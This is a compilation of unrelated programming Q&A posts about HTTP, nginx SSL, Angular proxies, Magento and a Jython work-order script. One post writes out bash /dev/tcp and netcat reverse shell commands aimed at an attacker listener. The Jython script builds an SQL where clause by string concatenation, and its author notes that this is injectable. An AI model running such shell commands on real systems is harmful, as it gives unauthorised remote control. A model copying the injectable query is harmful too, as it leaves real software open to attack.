http – Why am I getting a 400 BAD REQUEST error for simple GET request?

I’m using an old programming language (Adobe’s Extendscript). It has a simple Socket object to send TCP/IP requests.
The following lines always used to work for me:

reply = "";
conn = new Socket;
if (conn.open ("www.freelancebookdesign.com:80")) {
    conn.write ("GET /license.txt HTTP/1.1nhost: freelancebookdesign.comnn");
    reply = conn.read(9999);
    conn.close();
}

But a couple of days ago, my hosting company (Bluehost) migrated my website to a new box (without being asked to do so, or giving advanced warning).
Now the same lines above return the following 400 error:

HTTP/1.1 400 Bad Request
Date: Thu, 02 Jul 2020 10:14:48 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Accept-Ranges: bytes
host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
Content-Length: 130
Content-Type: text/html; charset=UTF-8

I’ve contacted their customer support, but received a clueless response.
I don’t know if this is the right place to ask for help, but I would really appreciate it if anyone has any ideas what the issue might be, even if I can just give their customer support some pointers in the right direction.
What might be the difference between the old server setup and the new that would be causing this?

ssl – converting nginx from http to https

i am hosting a website on aws lighsail server. it is single server and i am running 4 docker container on it. 1-nginx , 2-node js, 3- spring bot, 4 – mysql.

As for now my website is loading great with this :

    server {
    listen       80;
    server_name  *.example.com;

    #charset koi8-r;
    #access_log  /var/log/nginx/host.access.log  main;
    client_max_body_size 100M;
    location / {
        proxy_pass http://cahub-client:4000;
    }

    location /api {
        rewrite /api/(.*) /$1  break;
        proxy_pass http://microservice:8080;
    }

    #error_page  404              /404.html;

    # redirect server error pages to the static page /50x.html
    #
    error_page   500 502 503 504  /50x.html;
    location = /50x.html {
        root   /usr/share/nginx/html;
    }
}

I have purchased ssl certificate from goddady, and now installing on my server.

server {
    listen 80 default_server;
    listen (::):80 default_server;
    server_name _;
    return 301 https://$host$request_uri;
    }

server {
    listen 443 ssl;
    server_name  *.domain.com;
    
    ssl_certificate /etc/nginx/certs/cae51a61335308544.pem;
    ssl_certificate_key /etc/nginx/certs/www.eaxmple.com.key;

    #charset koi8-r;
    #access_log  /var/log/nginx/host.access.log  main;
    client_max_body_size 200M;
    location / {
        proxy_pass http://cahub-client:4000;
    }

    location /api {
        rewrite /api/(.*) /$1  break;
        proxy_pass http://microservice:8080;
    }

    #error_page  404              /404.html;

    # redirect server error pages to the static page /50x.html
    #
    error_page   500 502 503 504  /50x.html;
    location = /50x.html {
        root   /usr/share/nginx/html;
    }
}

So what is happening here is now. that when i type my domain in url it goes and redirect to https but only angular client location block is getting run which is my frontend. but whenever a call from frontend to backend is made. it should also go to my reverse proxy block /api.. this is not reolvong instead getting an error mixedcontext found. when i see in network tab. My frontend call is going as https://example.com but my backend call is going as earlier http://example.com/api/.

javascript – Is it possible to load data from the server using a HTTP POST request within a Magento Module js file?

Is it possible to load data from the server using an HTTP POST request within a Magento Module js file?

File located in
app/code/MyVendor/myCustomModule/view/frontend/web/js/mycustom.js

Example request:

   function test(){
      $.post("sample_data.php", function(data, status){
        alert("Data: " + data + "nStatus: " + status);
      });
    };

On the frontend I get 403 error when the sample_data.php is called

http – Enabling Proxy in the Angular Production

I am required to make a cross domain call to get data. So in my development environment I have created proxy.conf.json and call the API in the following manner. It works fine in the Dev environment. If I don’t use the proxy.conf.json, I am getting the CORS error.

In the proxy.conf.json

"/happyPath" : {
"target" : "https://www.example.com",
"secure" : false,
"pathRewrite": {
  "^/happyPath": ""
},
"changeOrigin" : true
}

In my service.ts

happyHeaders = {
headers : new HttpHeaders({
  'Content-Type' :  'application/json;charset=utf-8',
  'Authorization' : 'Basic ' + '############',
  'responseType' : 'text' as 'json'})
};

getUsers() {
return this.http.get<any>(`happyPath/users`, this.happyHeaders );
}

So I am required to use this service in the production. I read so many content in the internet and tried many things. As I could understand, in the ng-build, it doesn’t make use of the proxy.conf.json. So when I define the url in the server as

getUsers() {
    return this.http.get<any>(`https://www.example.com/happyPath/users`, this.happyHeaders );
}

I am getting the CORS error. How can I resolve this? Is there is a way to define changeOrigin:true and secure:false in the header ?

bash – Unable to start reverse shell over HTTP

I am able to get a reverse shell working locally over TCP, but failing to trigger it remotely over HTTP.

Locally over TCP:

  • Attacker terminal runs netcat to listen for a connection over port 8000: nc -vv -l 8000
  • Target terminal sends an interactive bash shell to the attacker: bash -i >& /dev/tcp/localhost/8000 0>&1;
  • Success!

Remotely over HTTP:

  • Attacker runs netcat to listen for a connection over port 8000: nc -vv -l 8000
  • Attacker runs ngrok to generate a web-facing IP: ./ngrok http --subdomain=example 8000
  • Target runs an interactive bash shell: bash -i >& /dev/tcp/example.ngrok.io/80 0>&1; (using port 80 because it’s HTTP)
  • The connection fails; I don’t even see any incoming traffic showing up on ngrok.

I also tried using netcat on the target machine, which unfortunately had the same result: /bin/bash 0< /tmp/mypipe | nc 192.168.1.100 4444 1> /tmp/mypipe (from this post)

Can anyone spot what I’m doing wrong?

javascript – Mi aplicaciĆ³n de angular esta reescribiendo la solicitud http y la esta generando como https en mi servidor local

este seria mi solicitud en el servicio

import { Injectable } from '@angular/core';
import { HttpClient, HttpHeaders } from '@angular/common/http';
import { RouterService } from '../../shared/services/router.service';

@Injectable({
  providedIn: 'root'
})
export class RequestBrokerService {


  constructor(private http: HttpClient, private routerService: RouterService) {

  }

getItem(){
   return this.http.get("http://midominio.com/api/callback");
}

}

esta seria mi componente usando el servicio

import { Component, OnInit } from '@angular/core';
import { RequestBrokerService } from '../service/request-broker.service';
import { Request } from '../model/request';

@Component({
  selector: 'app-requestlist',
  templateUrl: './requestlist.component.html',
  styleUrls: ('./requestlist.component.scss')
})
export class RequestlistComponent implements OnInit {

  constructor(private requestService: RequestBrokerService) { }

  ngOnInit() {
     this.requestService.getItem().subscribe(resp => {
      console.log(resp);
     }, err => {
      console.log(err);
      })
}

}


y el error que me devuelve es que

https://midominio.com/api/callback ha superado el tiempo de espera. es decir me genera la peticion como estuviera usando certifcado, esto solo pasa cuando trato de acceder desde la aplicacion a alguna api fuera de mi servidor local.

python – Create or update record via HTTP request

I have an external system that sends an HTTP request to a Jython script (in IBM’s Maximo Asset Management platform).

The Jython 2.7.0 script does this:

  1. Accepts an HTTP request: http://server:host/maximo/oslc/script/CREATEWO?_lid=wilson&_lpwd=wilson&f_wonum=LWO0382&f_description=LEGACY WO&f_classstructureid=1666&f_status=APPR&f_wopriority=1&f_assetnum=LA1234&f_worktype=CM
  2. Loops through parameters:
    • Searches for parameters that are prefixed with f_ (‘f’ is for field-value)
    • Puts the parameters in a list
    • Removes the prefix from the list values (so that the parameter names match the database field names).
  3. Updates or creates records via the parameters in the list:
    • If there is an existing record in the system with the same work order number, then the script updates the exiting record with the parameter values from the list.
    • If there isn’t an existing record, then a new record is created (again, from the parameter values from the list).
  4. Finishes by returning a message to the external system (message: updated, created, or other (aka an error)).

Can the script be improved?


from psdi.server import MXServer
from psdi.mbo import MboSet

params = list( param for param in request.getQueryParams() if param.startswith('f_') )
paramdict={} 
resp='' 
for p in params:
    paramdict(p(2:))=request.getQueryParam(p)

woset = MXServer.getMXServer().getMboSet("workorder",request.getUserInfo())
whereClause = "wonum= '" + request.getQueryParam("f_wonum")+ "'"

woset.setWhere(whereClause)
woset.reset()
woMbo = woset.moveFirst()

if woMbo is not None:
    for k,v in paramdict.items():
        woMbo.setValue(k,v,2L)
    resp = 'Updated workorder ' + request.getQueryParam("f_wonum")
    woset.save()
    woset.clear()
    woset.close()
else:
    woMbo=woset.add()
    for k,v in paramdict.items():
        woMbo.setValue(k,v,2L)
    resp = 'Created workorder ' + request.getQueryParam("f_wonum")
    woset.save()
    woset.clear()
    woset.close()
responseBody = resp

Note 1: I’ve been told that the where clause in this script is vulnerable to SQL injection. I’m aware of this issue and have reached out to my organization’s technical/security experts for ideas about how to mitigate this risk.

Note 2: Unfortunately, I’m not able to import Python 2.7.0 libraries into my Jython implementation. In fact, I don’t even have access to all of the standard python libraries.

Note 3: The acronym ‘MBO’ stands for ‘Master Business Object’ (it’s an IBM thing). For the purpose of this question, a Master Business Object can be thought of as a work order record. Additionally, the constant 2L tells the system to override any MBO rules/constraints.

fallback – Best guidance for allowing users to connect via HTTP in case of a certificate error

I’ve coded my app to use https, but if a https transaction fails for any reason, I assume it’s because the server isn’t configured for https, and thereafter start all transactions with http. Seems like that’s a vulnerability. Likewise, a script kiddie using a proxy to intercept the traffic on his client hardware would be able to make all https transactions fail.

I’m told that if someone tries to MITM your app’s HTTPS request then the request should fail (invalid certificate) and your app should fail with an error, not fallback to HTTP. In a world where SSL is reliably available, sure, but maintaining valid SSL certs is a task in itself. For example, letsencrypt recently revoked some of their certificates and forced renewal of same because of some security problem. Aside from revocations, certs are short term and have to be renewed, and the renewal process involves a lot of stitchware, and can fail. If SSL goes down, I don’t want my site to go dark.

What is the best guidance for either:

  1. More reliably maintaining certificates (such that if they do fail, the resulting downtime falls within the “five nines” SLA unavailability window) without it being such a manual headache, or

  2. Allowing the site to continue to work if SSL has failed? Is it easy to allow most activity to proceed using http, but allow known-critical transactions to require https.

Note that no browsers are involved in the scenarios that concern me.

encryption – Solution to User Initial HTTP Requests Unencrypted Despite HTTPS Redirection?

It is my understanding that requests from a client browser to a webserver will initially follow the specified protocol e.g, HTTPS, and default to HTTP if not specified (Firefox Tested). On the server side it is desired to enforce a strict type HTTPS for all connections for the privacy of request headers and as a result HTTPS redirections are used. The problem is that any initial request where the client does not explicitly request HTTPS will be sent unencrypted. For example, client instructs browser with the below URL command.

google.com/search?q=unencrypted-get

google.com will redirect the client browser to use HTTPS but the initial HTTP request and GET parameters were already sent unencrypted possibly compromising the privacy of the client. Obviously there is nothing full-proof that can be done by the server to mitigate this vulnerability but:

  1. Could this misuse compromise the subsequent TLS security possibly through a known-plaintext
    attack (KPA)?
  2. Are there any less obvious measures that can be done to mitigate this possibly through some
    DNS protocol solution?
  3. Would it be sensible for a future client standard to always initially attempt with HTTPS as the default?

Difference between the Accept and Content-Type HTTP headers

As you correctly note, the Accept header is used by HTTP clients to tell the server what content types they’ll accept. The server will then send back a response, which will include a Content-Type header telling the client what the content type of the returned content actually is.

However, as you may have noticed, HTTP requests can also contain Content-Type headers. Why? Well, think about POST or PUT requests. With those request types, the client is actually sending a bunch of data to the server as part of the request, and the Content-Type header tells the server what the data actually is (and thus determines how the server will parse it).

In particular, for a POST request resulting from an HTML form submission, the Content-Type of the request will (normally) be one of the standard form content types below, as specified by the enctype attribute on the <form> tag:

  • application/x-www-form-urlencoded (default, older, simpler, slightly less overhead for small amounts of simple ASCII text, no file upload support)
  • multipart/form-data (newer, adds support for file uploads, more efficient for large amounts of binary data or non-ASCII text)